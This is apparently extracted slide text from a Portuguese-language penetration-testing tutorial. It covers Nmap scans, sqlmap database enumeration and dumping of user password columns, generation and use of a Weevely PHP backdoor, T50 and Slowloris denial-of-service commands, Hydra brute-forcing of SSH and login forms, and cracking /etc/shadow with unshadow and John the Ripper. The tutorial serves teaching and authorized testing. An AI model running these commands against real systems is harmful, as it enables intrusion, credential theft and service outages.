  • 9. Nmap:  -sP  Ping scan: Algumas vezes é necessário saber se um determinado host ou rede estáno ar.  Nmap pode enviar pacotes ICMP “echo request” para verificar sedeterminado host ou  rede está ativa. Hoje em dia, existem muitos filtros querejeitam os pacotes ICMP “echo  request”, então envia um pacote TCP ACK paraa porta 80 (default) e caso receba RST o  alvo está ativo. A terceira técnica enviaum pacote SYN e espera um RST ou SYN-ACK.  Nmap –sP 192.168.1.254  Nmap –sP 192.168.1.0/24
  • 10. Nmap:  TCP SYN scan: Técnica também conhecida como “half-open”, pois não abre uma conexão TCP completa. É enviado um pacote SYN, como se ele fosse uma conexão real e aguarda uma resposta. Caso um pacote SYN-ACK seja recebido, aporta está aberta, enquanto um como resposta indica que a porta está fechada.  A vantagem dessa abordagem é que poucos irão detectar esse scanning de portas.  Nmap –sS 192.168.1.254  Nmap –sS 192.168.1.0/24
  • 11. Nmap:  -sT  TCP connect() scan: É a técnica mais básica de TCP scanning. É utilizada a chamada de sistema (system call) “connect()” que envia um sinal as portas ativas. Caso a porta esteja aberta recebe como resposta “connect()”. É um dos scan mais rápidos, porém fácil de ser detectado  Nmap –sT 192.168.1.254  Nmap –sT 192.168.1.0/24
  • 12. Nmap:  -sU  UDP scan: Este método é utilizado para determinar qual porta UDP está aberta em um host. A técnica consiste em enviar um pacote UDP de 0 byte para cada portado host.  Se for recebido uma mensagem ICMP “port unreachable” então a porta está fechada, senão a porta pode estar aberta. Para variar um pouco, a Microsoft ignorou a sugestão da RFC e com isso a varredura de máquinas Windows é muito rápida.  Nmap –sU 192.168.1.254
  • 13. Nmap:  -O  Ativa a identificação do host remoto via TCP/IP. Irá apresentar versão do Sistema  Operacional e tempo ativo.  Ex.: nmap -O alvo  -v  Modo verbose. Mostra tudo o que está se passando.  Ex.: nmap -v alvo
  • 14. Nmap:  -F  Procura pelas portas que estão no /etc/services. Método mais rápido, porém não procurar por todas as portas.  Ex.: nmap -F alvo  -P0  Não tenta pingar o host antes de iniciar a varredura. Isto permite varrer alvos que bloqueiam ICMP “echo request (ou responses)” através de firewall.  Ex.: nmap -P0 alvo
  • 15. Xprobe2:  Xprobe2 analisa banners de sistemas operacionais, comparando com um banco de dados interno, onde compara-os e informa o S.O. utilizado e a versão do mesmo.  Exemplo:  xprobe2 [host-name]  xprobe2 <ip>
  • 16. Nikto : Nikto é um script Perl usado para testar a segurança de seu servidor web. Ele faz a varredura em servidores Apache tanto em busca de vulnerabilidades, quanto de falhas de configuração.  Para atualizar e executar o Nikto, utilizamos os seguintes comandos:  # ./nikto.pl -update  # ./nikto.pl -h 192.168.131.1 -o /192.168.131.1.txt
  • 17. SQL Map: Local: /pentest/database/sqlmap String: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" – [opções]
  • 18. SQL Map :  “Sqlmap é uma ferramenta open source para penetration test que automatiza o processo de detecção e exploiting de vulnerabilidades a Sqli Injection, é escrita em python e tem suporte tanto GNU linux ou windows.” O sqlmap além de oferecer as funções para detectar e explorar as vulnerabilidades a SQLI, ele consegue também tentar “dominar” o sistema de banco de dados se for possivel.
  • 19. SQL Map :  --help  Mostra as opções do SQLMAP  --current-db  Apresenta o banco de dados atual Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --current-db  --banner  Pega o Banner do DBMS  Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" -b  --dbs  Lista os bancos de dados do DBMS Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --dbs
  • 20. SQL Map :  --tables  Apresenta as tabelas do banco selecionado Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"  -D acuart --tables  --columns  Apresenta as colunas da tabela selecionada  Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"  -D acuart -T users --columns  --dump  Extrai as informações da colunas selecionadas Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"  -D acuart -T users -C 'uname,pass' --dump
  • 21. SQL Map :  --current-user  Apresenta o usuário ao qual a página está usando para se conectar ao banco Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --current- user  --is-dba  Verifica se o usuário atual é administrador do Banco  Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --is-dba  --users  Enumera todos os usuários  Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --users  --search  Varre o banco atrás do que você procura, pode ser um banco, tabela ou coluna  Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1" --search – C „pass‟
  • 22. SQL Map :  --user-agent  Altera o nome do user Agent durante o ataque Exemplo: ./sqlmap.py --url "http://testphp.vulnweb.com/listproducts.php?cat=1"  --user-agent=“Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”  --level=1-5  Seta o nível de performance que ele irá utilizar para efetuar a varredura  --risk=1-3  Seta o nível de risco de performance que o sqlmap efetuará para a varredura
  • 24. Weevely:  Weevely é um backdoor PHP discreto que simula uma conexão telnet. É uma ferramenta essencial para ser injetada após a exploração de uma vulnerabilidade de uma aplicação web. Com uma permissão básica para fazer upload de arquivos PHP, você só precisa gerar e fazer o upload do código do "servidor" PHP no alvo, e executado localmente o Weevely transmiti comandos de shell.
  • 25. Weevely:  Uso:  Gerando o Backdoor:  ./weevely generate teste/tmp/back.php  # Cria um backdoor com a senha eSecurity na pasta /tmp  ./weevelyhttp://www.sitevul.com/back.php teste  # Acessa a shell utilizando a senha teste
  • 26. DoS: T50 ferramenta de desenvolvida por um brasileiro, Nelson Brito, capaz de fazer ataques DoS e DDoS usando o conceito de stress testing: # ./t50 www.ofm.com.br --flood --turbo --dport 80 -S --protocol ICMP  ./t50 192.168.1.105 --flood --turbo --dport 80 -S – protocol  --flood  --turbo (Aumenta a performance)  -S (envia a flag SYN)
  • 27. DoS: Slowloris: Atacandos velhos apaches # wget http://ha.ckers.org/slowloris/slowloris.pl  # chmod 777 slowloris.pl  Ele funciona enviando, atraves de um processo multi-thread, varias requisições parciais ao servidor Web alvo
  • 28. Hydra: THC-Hydra (Last update 2012-05-23) String: hydra –L <login> -P <passwd> <ip> <serv>
  • 29. Hydra: # hydra –l root -p toor –t 12 127.0.0.1 ssh  Ele irá efetuar um bruteforce com usuário root com a senha toor com 12 threads no loopback na porta SSH # hydra –l root -P wordlist.txt –t 12 127.0.0.1 ssh  Ele irá efetuar um bruteforce com usuário root com a senha buscando na wordlist.txt com hydra -l teste -P wordlist 192.168.1.105 http-post-form "/verificar.php:login=^USER^&senha=^PASS^:Login e senha incorretos"
  • 30. Passwd: O arquivo /etc/passwd contém informações sobre todos os usuários, inclusive as suas senhas criptografadas. Ele é legível por todos os usuários e, por isso, estas senhas podem ser facilmente crackeadas. Para combater esta vulnerabilidade foi desenvolvido o sistema de sombreamento de senhas, os shadows passwords. Quando o sistema de sombreamento de senhas está disponível, o campo password do arquivo /etc/passwd é substituído por um "x" e o password do usuário é armazenado no arquivo /etc/shadow. Por esta razão o /etc/shadow é legível somente pelo usuário root. Desta maneira o arquivo /etc/shadow dificulta a ação de crackers.
  • 32. John :  John the Ripper é um software para quebra de senhas. Inicialmente desenvolvido para sistemas unix-like, corre agora em vários sistemas operativos (como DOS, Windows, Linux, BSD). Disponível em versão livre e paga, o John the Ripper é capaz fazer força bruta em senhas cifradas em DES, MD4 e MD5 entre outras  Dicionário (Wordlist): sendo o modo mais simples.  Quebra Simples (Single Crack): mais indicado para início de uma quebra e mais rápido que o wordlist
  • 33. John :  Ferramenta: Unshadow  Utilizadapara unir os arquivos passwd e shadow para posteriormente ser quebrada pelo John the Ripper  Exemplo: ./unshadow /etc/passwd /etc/shadow >> hash.db  Agora quebramos usando: ./john hash.db
  • 34. John :  ./johnsenhas.txt # O modo mais simples de se usar o John é especificar o arquivo que tem as senhas e usuário e deixar ele fazer tudo  automaticamente. Ele irá começar com o modo single crack, depois irá passar para o modo wordlist e finalmente irá passar para o modo incremental.